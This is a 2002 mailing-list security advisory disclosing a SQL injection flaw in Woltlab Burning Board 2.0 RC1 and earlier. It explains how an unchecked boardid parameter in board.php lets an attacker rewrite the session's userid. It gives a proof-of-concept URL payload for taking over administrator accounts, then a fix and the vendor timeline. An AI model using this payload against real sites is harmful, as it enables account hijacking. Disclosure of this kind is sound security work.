Subject: sql injection vulnerability in WBB 2.0 RC1 and below
Date: Sep 8 2002 1:56PM
Author: Cano2 <Cano2@buhaboard.de>

   Hi,
   I discovered a serious vulnerability in Woltlab Burning Board 2.0 RC 1
   and below some weeks ago. The latest version (WBB 2.0 RC 2) seems not
   vulnerable, but there are still sites using vulnerable versiones.

   [versions tested vulnerable]
   WBB 2.0 RC 1
   WBB 2.0 beta 5
   WBB 2.0 beta 4
   WBB 2.0 beta 3

   [description]
   It allows any user (even guests, may depend
   on configuration) to compromise every other account (Administrator
   one's too). It's caused by a variable containing unchecked userinput
   in board.php, which can be used for a sql injection attack.

   The query looks similar to the following:

   UPDATE LOW_PRIORITY bb1_sessions SET lastactivity = 'xxx', request_uri = '$HTTP_REQUEST_URI'',
   boardid =
   '$boardid', threadid = 'xx' WHERE hash = '$sid'

   Because the content of $boardid is not checked, it's possible to
   overwrite othe fields in the table.

   [proof of concept]
   board.php?boardid=[boardid]%27,%20userid=%27[victims userid, 1 is
   usually an admin]&sid=[attackers session-id]

   The executed query now looks like that:

   UPDATE LOW_PRIORITY bb1_sessions SET lastactivity = 'xxx', request_uri =
   'board.php?boardid=[boardid]%27,%20userid=%27[gewünschte userid, 1 ist i.d.R immer
   admin]&sid=[session-id]', boardid = '[boardid]' userid='[gewünschte userid, 1 ist i.d.R immer
   admin]',
   threadid = 'xx' WHERE hash = '$sid'

   As you can see, the userid of the attackers session is overwritten
   with the victim one's.

   [solution]
   Update to the latest Version (WBB 2.0 RC2) or check every variable
   possibly containing userinput.

   p.e.

   $boardid = mysql_escape_string($boardid);

   [vendor status]
   29.7.02 contacted Woltlab
   12.8.02 release of WBB 2.0 RC 2 (seems not vulnerable)

   I did't get an answer from Woltlab until now.